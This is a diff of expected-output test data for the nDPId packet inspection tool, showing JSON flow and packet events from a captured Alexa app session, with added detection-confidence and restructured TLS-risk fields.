 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1490976071324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976071324,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo70lAAEAGV7msECrYNF7ohsHGAFAgR7VsNw+nR1AQAVdEjwAA"}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}}
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071349,"flow_last_seen":1490976071349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976071349,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1490976071349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976071349,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lMZAAEAGsiisECrYNF7ohrJ\/Abuhu87oAAAAAKAC\/\/\/ULgAAAgQFtAQCCAoA9louAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1490976071360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976071360,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwaLpAAOcGN0A0XuiGrBAq2AG7sn5peFkmyPjA43ASH\/5viQAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1490976071361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976071361,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomslAAEAGrDmsECrYNF7ohrJ+AbvI+MDjaXhZJ1AQAVe5+gAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1490976071363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976071363,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWSpAAOcGRtA0XuiGrBAq2AG7sn0V5Ch+kScxUnASH\/67KQAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1490976071364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976071364,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoa3pAAEAG24isECrYNF7ohrJ9AbuRJzFSFeQof1AQAVcFmwAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071380,"flow_last_seen":1490976071380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976071380,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1490976071380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976071380,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Ky9AAEAGG8CsECrYNF7ohrKAAbueQXEdAAAAAKAC\/\/81bwAAAgQFtAQCCAoA9loyAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071385,"flow_last_seen":1490976071385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976071385,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1490976071385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976071385,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fzdAAEAGx7esECrYNF7ohrKBAbt+UyUFAAAAAKAC\/\/+hdAAAAgQFtAQCCAoA9loyAAAAAAEDAwg="}
 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1490976071389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"ts_msec":1490976071389,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl2DBAAEARtV2sECoBrBAq2AA1YfkAUYstBuuBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADUACwhwaXRhbmd1acASwC4AAQABAAAANQAENF7ohg=="}
-00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976071389,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976071389,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071392,"flow_last_seen":1490976071392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976071392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1490976071392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976071392,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hllAAEAGwJWsECrYNF7ohukyAbtO5dxqAAAAAKAC\/\/\/iygAAAgQFtAQCCAoA9lozAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1490976071431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976071431,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwichAAOcGFjI0XuiGrBAq2AG7soCzlhpDnkFxHnASH\/7eyAAAAgQFtAEDAwY="}
-01516{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
+01623{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1490976071433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976071433,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKzBAAEAGG9OsECrYNF7ohrKAAbueQXEes5YaRFAQAVcpOgAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+BAAOcGWBo0XuiGrBAq2AG7sn8uyCJ8obvO6XASH\/76GQAAAgQFtAEDAwY="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+FAAOcGWBk0XuiGrBAq2AG7soEpho4ZflMlBnASH\/5hCAAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAolMdAAEAGsjusECrYNF7ohrJ\/Abuhu87pLsgifVAQAVdEiwAA"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofzhAAEAGx8qsECrYNF7ohrKBAbt+UyUGKYaOGlAQAVereQAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
